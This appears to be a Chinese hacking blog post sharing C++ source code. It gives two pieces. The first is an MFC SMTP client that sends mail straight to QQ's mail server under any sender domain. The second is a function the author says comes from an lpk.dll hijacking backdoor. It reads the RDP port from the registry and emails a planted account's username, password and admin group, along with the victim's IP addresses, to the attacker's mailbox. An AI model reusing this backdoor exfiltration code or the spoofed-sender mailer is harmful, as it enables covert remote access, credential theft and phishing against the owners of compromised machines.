源码下载地址 (MFC)
http://www.vdisk.cn/down/index/10021464
核心代码这里 (可以用任意域名发信)
void
CSendFastMailDlg::OnBtnTest()
{
// TODO:
Add your control notification handler code here
char
buff[100];
CString
curuser;
CString
curmailfrom;
CString
currcptto;
CString
curdomain;
CString
strsubject;
CString
strmessagebody;
CString
strtemp;
CString strmail;
//curuser="abc";
GetDlgItemText(IDC_EDIT_CURDOMAIN,curdomain);
GetDlgItemText(IDC_EDIT_RCPTTO,currcptto);
GetDlgItemText(IDC_EDIT_MAILSENDERNICK,curuser);
GetDlgItemText(IDC_EDIT_SUBJECT,strsubject);
GetDlgItemText(IDC_EDIT_MESSAGEBODY,strmessagebody);
currcptto+="@qq.com";
curmailfrom.Format(");
memset(buff,0,100);
if(!m_socket.Create())
{
MessageBox("创建socket失败.");
return;
}
if(!m_socket.Connect("mx0.qq.com",25))
{
MessageBox("连接服务器失败");
return;
}
//连接成功后取得欢迎信息
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"220"))
{
m_socket.Close();
MessageBox(buff,"220错误");
return;
}
//发送HELO命令
sprintf(buff,"HELO
%s\r\n",curdomain);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"HELO命令返回错误");
return;
}
//发送MAIL
FROM命令
sprintf(buff,"MAIL
FROM:<%s>\r\n",curmailfrom);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"MAIL
FROM命令返回错误");
return;
}
//发送RCPT
TO命令
sprintf(buff,"RCPT
TO:<%s>\r\n",currcptto);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(IsSameString(buff,3,"550"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
m_socket.Receive(buff,100);
//m_socket.Close();
strtemp.Format("你的邮件收件人地址不存在\r\n服务器信息:%s",buff);
MessageBox(strtemp);
return;
}
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"RCPT
TO命令返回错误");
return;
}
sprintf(buff,"DATA\r\n");
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"354"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"DATA命令返回错误");
return;
}
//按照格式来构造邮件
strmail="";
strtemp.Format("From:
\"%s\"
<%s>\r\n",curuser,curmailfrom);
strmail+=strtemp;
strtemp.Format("To:
<%s>\r\n",currcptto);
strmail+=strtemp;
strtemp.Format("Subject:
%s\r\n",strsubject);
strmail+=strtemp;
CTime
time=CTime::GetCurrentTime();
strtemp=time.Format("Date:
%a,%d %b %Y %X +0800\r\n"); //"Date: Thu, 30 Aug 2007 15:23:32
+0800\r\n"; //预留日期
strmail+=strtemp;
strtemp="Content-Type:
multipart/mixed;
boundary=\"#BOUNDARY.CMAILSERVER#\"\r\n\r\n\r\n";
strmail+=strtemp;
strtemp="--#BOUNDARY.CMAILSERVER#\r\n";
strmail+=strtemp;
strtemp="Content-Type:
text/html; charset=\"gb2312\"\r\nContent-Transfer-Encoding:
7bit\r\n\r\n";
strmail+=strtemp;
strmail+=strmessagebody;
strtemp="\r\n\r\n--#BOUNDARY.CMAILSERVER#--\r\n\r\n.\r\n";
strmail+=strtemp;
//发送邮件正文
m_socket.Send(strmail,strmail.GetLength());
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"DATA命令返回错误");
return;
}
//发送QUIT命令
sprintf(buff,"QUIT\r\n");
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"221"))
{
MessageBox(buff,"QUIT命令返回错误");
return;
}
m_socket.Close();
MessageBox("发送成功");
}
接下来贴上
exe后门发信的代码来自最近给泪少写的lpk.dll劫持 把代码提出的
void SendMail()
{
StartupSocket();
char
buff[100] =
{0};
char
curuser[MAX_PATH] =
{0}; //称呼
char
curmailfrom[MAX_PATH] = {0};
char
currcptto[MAX_PATH] =
{0}; //发邮件
char
curdomain[MAX_PATH] =
{0}; //域名
char
strsubject[MAX_PATH] =
{"你的lpk.dll提权回信啦"};
char
strmessagebody[512]
=
{0}; //发送内容
char
strtemp[MAX_PATH] =
{0};
char
strmail[1024] =
{0};
char
strIP[MAX_PATH]
= {0};
strcpy(curdomain,modify_data.m_domain);
strcpy(currcptto,modify_data.m_mail);
strcpy(curuser,modify_data.m_muser);
HKEY
hkey;
char
he[MAX_PATH]="SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\WinStations\\RDP-Tcp\\";
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,he,0,KEY_ALL_ACCESS,&hkey))
{
//MessageBox(NULL,"打开失败了","xc",NULL);
}
DWORD
sz;
DWORD
type_2=REG_DWORD;
DWORD
cbData_2=80;
RegQueryValueEx(hkey,"PortNumber",NULL,&type_2,(unsigned
char
*)&sz,&cbData_2);//查询3389端口代码
RegCloseKey(hkey);
sprintf(curmailfrom,");
sprintf(strmessagebody,"用户名:%s\n,密码:%s\n,管理组:%s\n,端口:%d\n",modify_data.user,
modify_data.pass,modify_data.admin,sz);
SOCKET sock
= socket(AF_INET,SOCK_STREAM,0);
HOSTENT
*host = gethostbyname("mx0.qq.com");
char
temp[MAX_PATH] = {0};
sprintf(temp,"%d.%d.%d.%d",
host->h_addr_list[0][0]&0x00ff,
host->h_addr_list[0][1]&0x00ff,
host->h_addr_list[0][2]&0x00ff,
host->h_addr_list[0][3]&0x00ff);
SOCKADDR_IN
sa;
sa.sin_addr.s_addr =
inet_addr(temp);
sa.sin_family
= AF_INET;
sa.sin_port
= htons(25);
if(SOCKET_ERROR ==
connect(sock,(sockaddr*)&sa,sizeof(sa)))
{
LOGFILE("连接服务器失败");
return;
}
//连接成功后取得欢迎信息
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"220"))
{
closesocket(sock);
LOGFILE("220错误");
return;
}
//发送HELO命令
sprintf(buff,"HELO
%s\r\n",curdomain);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"250"))
{
LOGFILE("HELO命令返回错误");
return;
}
//发送MAIL
FROM命令
sprintf(buff,"MAIL
FROM:<%s>\r\n",curmailfrom);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("MAIL
FROM命令返回错误");
return;
}
//发送RCPT
TO命令
sprintf(buff,"RCPT
TO:<%s>\r\n",currcptto);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(IsSameString(buff,3,"550"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
recv(sock,buff,100,0);
closesocket(sock);
LOGFILE("你的邮件收件人地址不存在\r\n服务器信息:%s",buff);
return;
}
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE(buff,"RCPT
TO命令返回错误");
return;
}
sprintf(buff,"DATA\r\n");
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"354"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("DATA命令返回错误");
return;
}
//按照格式来构造邮件
sprintf(strtemp,"From:
\"%s\"
<%s>\r\n",curuser,curmailfrom);
strcat(strmail,strtemp);
sprintf(strtemp,"To:
<%s>\r\n",currcptto);
strcat(strmail,strtemp);
sprintf(strtemp,"Subject:
%s\r\n",strsubject);
strcat(strmail,strtemp);
SYSTEMTIME
sys;
GetLocalTime(&sys);
// CTime
time= GetCurrentTime();
// strtemp=time.Format("Date:
%a,%d %b %Y %X +0800\r\n"); //"Date: Thu, 30 Aug 2007 15:23:32
+0800\r\n"; //预留日期
time_t t =
time(0);
strftime(strtemp,sizeof(strtemp),"Date:
%a,%d %b %Y %X
+0800\r\n",localtime(&t));
strcat(strmail,strtemp);
sprintf(strtemp,"Content-Type:
multipart/mixed;
boundary=\"#BOUNDARY.CMAILSERVER#\"\r\n\r\n\r\n");
strcat(strmail,strtemp);
sprintf(strtemp,"--#BOUNDARY.CMAILSERVER#\r\n");
strcat(strmail,strtemp);
sprintf(strtemp,"Content-Type:
text/html; charset=\"gb2312\"\r\nContent-Transfer-Encoding:
7bit\r\n\r\n");
strcat(strmail,strtemp);
strcat(strmail,strmessagebody);
ZeroMemory(strtemp,MAX_PATH);
GetLocalIP(strtemp,MAX_PATH);
LOGFILE(strtemp);
strcat(strmail,strtemp);
sprintf(strtemp,"\r\n\r\n--#BOUNDARY.CMAILSERVER#--\r\n\r\n.\r\n");
strcat(strmail,strtemp);
//发送邮件正文
send(sock,strmail,strlen(strmail),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("DATA命令返回错误,%s",buff);
return;
}
//发送QUIT命令
sprintf(buff,"QUIT\r\n");
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"221"))
{
LOGFILE("QUIT命令返回错误,%s",buff);
return;
}
closesocket(sock);
LOGFILE("发送成功");
WSACleanup();
}
///////////////////////////////////////////////////////////下面是以上函数申明 ///代码来自http://hi.baidu.com/hackxhj/blog/////////////
BOOL
StartupSocket()
{
WORD
wVersionRequested;
WSADATA
wsaData;
int
err;
wVersionRequested =
MAKEWORD( 2, 2 );
err =
WSAStartup( wVersionRequested, &wsaData
);
if ( err !=
0 ) return FALSE;
if ( LOBYTE(
wsaData.wVersion ) != 2 ||HIBYTE( wsaData.wVersion ) != 2
)
{
WSACleanup();
return
FALSE;
}
return
TRUE;
}
void
GetNetworkParameter(PIP_ADAPTER_INFO
pAdapterInfo,vector<char*>&
IPVector)
{
while
(pAdapterInfo != NULL)
{
if(0
==
strnicmp(pAdapterInfo->Description,"VMware",strlen("VMware")))//非虚拟机
{
pAdapterInfo
= pAdapterInfo->Next;
continue;
}
PIP_ADDR_STRING
IPList =
&(pAdapterInfo->IpAddressList);
while(IPList)
{
int
nCount =
strlen(IPList->IpAddress.String);
if(0
!= nCount)
{
char*
pAddr = new char[nCount+1];
strcpy(pAddr,IPList->IpAddress.String);
IPVector.push_back(pAddr);
}
IPList
= IPList->Next;
}
pAdapterInfo
= pAdapterInfo->Next;
}
}
void
FreeVector(vector<char*>&
IPVector)
{
for (int
i=0; i<IPVector.size(); i++)
{
char *
PTemp = IPVector[i];
delete
[]PTemp;
}
IPVector.clear();
}
void
GetLocalIPList(vector<char*>&
IPList)
{
unsigned
long
len =
sizeof(IP_ADAPTER_INFO);
PIP_ADAPTER_INFO pinfo =
(PIP_ADAPTER_INFO)malloc(len);
unsigned
long nError;
nError =
GetAdaptersInfo(pinfo,&len);
if
(ERROR_SUCCESS == nError)
{
GetNetworkParameter(pinfo,IPList);
}
if
(ERROR_BUFFER_OVERFLOW == nError)
{
pinfo
= (PIP_ADAPTER_INFO)malloc(len);
GetAdaptersInfo(pinfo,&len);
GetNetworkParameter(pinfo,IPList);
}
free(pinfo);
}
void GetLocalIP(char *pBuffer,
int nSize)
{
vector<char*>
IPList;
GetLocalIPList(IPList);
for (int
i=0; i<IPList.size(); i++)
{
int
nCount = strlen(IPList[i]);
if(nSize>nCount)
{
char
pTemp[30] = {0};
sprintf(pTemp,"IP%d=%s,",i,IPList[i]);
strcat(pBuffer,pTemp);
nSize
=nSize- nCount-4;
}
}
FreeVector(IPList);
}
转载请说明来自 http://blog.sina.com.cn/XGNHACK
加载中,请稍候......
加载中…
喜欢